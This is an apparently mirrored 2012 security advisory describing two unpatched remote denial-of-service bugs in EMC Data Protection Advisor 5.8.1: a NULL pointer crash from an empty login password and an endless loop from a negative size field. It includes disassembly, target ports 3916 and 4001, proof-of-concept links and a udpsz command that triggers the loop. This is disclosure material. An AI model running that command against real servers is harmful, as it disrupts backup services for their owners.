Vulners
Lucene search
EMC Data Protection Advisor 5.8.1 - Denial of Service
#######################################################################
Luigi Auriemma
Application: EMC Data Protection Advisor
http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm
Versions: <= 5.8.1
Platforms: AIX, HP-UX, Linux, Solaris, Windows
Bugs: A] cProcessAuthenticationData NULL pointer
B] thread CPU 100%
Exploitation: remote
Date: 29 Mar 2012
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's homepage:
"EMC Data Protection Advisor: Manage service levels, reduce complexity,
and eliminate manual efforts with EMC’s powerful data protection
management software that automates monitoring, analysis, alerting, and
reporting across backup, replication, and virtual environments."
#######################################################################
=======
2) Bugs
=======
------------------------------------------
A] cProcessAuthenticationData NULL pointer
------------------------------------------
The missing password field or an empty password in the
AUTHENTICATECONNECTION command required to login leads to a NULL
pointer dereference in the DPA_Utilities.cProcessAuthenticationData
function:
10042EA0 /$ 55 PUSH EBP
10042EA1 |. 8BEC MOV EBP,ESP
10042EA3 |. 83EC 0C SUB ESP,0C
10042EA6 |. A1 B04F0C10 MOV EAX,DWORD PTR DS:[100C4FB0]
10042EAB |. 33C5 XOR EAX,EBP
10042EAD |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
10042EB0 |. 53 PUSH EBX
10042EB1 |. 56 PUSH ESI
10042EB2 |. 8BF1 MOV ESI,ECX
10042EB4 |. 57 PUSH EDI
10042EB5 |. 56 PUSH ESI
10042EB6 |. E8 93E3FBFF CALL DPA_Util.decodeString
10042EBB |. 8BC8 MOV ECX,EAX
10042EBD |. 83C4 08 ADD ESP,8
10042EC0 |. 8D59 01 LEA EBX,DWORD PTR DS:[ECX+1]
10042EC3 |> 8A11 /MOV DL,BYTE PTR DS:[ECX] ; strlen() NULL pointer
10042EC5 |. 83C1 01 |ADD ECX,1
10042EC8 |. 84D2 |TEST DL,DL
10042ECA |.^75 F7 \JNZ SHORT DPA_Util.10042EC3
------------------
B] thread CPU 100%
------------------
Endless loop in the DPA_Utilities library while handling the protocol
if it's used a negative 64bit size field:
100138FC > 3BF1 CMP ESI,ECX
100138FE . 75 0C JNZ SHORT DPA_Util.1001390C
10013900 . 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C]
10013903 . 0B55 E8 OR EDX,DWORD PTR SS:[EBP-18]
10013906 . 0F84 C1020000 JE DPA_Util.10013BCD
1001390C > 2975 DC SUB DWORD PTR SS:[EBP-24],ESI
1001390F . 68 20870910 PUSH DPA_Util.10098720 ; "nsReadRequest"
...
100137F0 > 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
100137F3 > 8B75 E4 MOV ESI,DWORD PTR SS:[EBP-1C]
100137F6 > 837D E8 00 CMP DWORD PTR SS:[EBP-18],0 ; signed comparison
100137FA . 7F 4A JG SHORT DPA_Util.10013846
100137FC . 7C 04 JL SHORT DPA_Util.10013802
100137FE . 85F6 TEST ESI,ESI
10013800 . 77 44 JA SHORT DPA_Util.10013846
10013802 > 837D E0 00 CMP DWORD PTR SS:[EBP-20],0 ; signed comparison
10013806 . 0F8C 0B040000 JL DPA_Util.10013C17
1001380C . 7F 0A JG SHORT DPA_Util.10013818
1001380E . 837D DC 00 CMP DWORD PTR SS:[EBP-24],0
10013812 . 0F86 FF030000 JBE DPA_Util.10013C17
10013818 > BF 1B700910 MOV EDI,DPA_Util.1009701B
1001381D . 33F6 XOR ESI,ESI
1001381F > 33C9 XOR ECX,ECX
10013821 . 894D F4 MOV DWORD PTR SS:[EBP-C],ECX
10013824 . 894D F0 MOV DWORD PTR SS:[EBP-10],ECX
10013827 . 390B CMP DWORD PTR DS:[EBX],ECX
10013829 . 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
1001382C . 894D EC MOV DWORD PTR SS:[EBP-14],ECX
1001382F . 0F84 C7000000 JE DPA_Util.100138FC
Note that this loop doesn't affect the working of the other connections
to the affected service.
Both the bugs can be exploited in the following services:
- DPA_Controller on port 3916
- DPA_Listener on port 4001
#######################################################################
===========
3) The Code
===========
A]
http://aluigi.org/poc/dpa_1.zip
dpa_1 SERVER
B]
http://aluigi.org/testz/udpsz.zip
udpsz -c "18446744073709551615/1/UNB" -T SERVER 3916 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Mar 2012 00:00Current
7.4High risk
Vulners AI Score7.4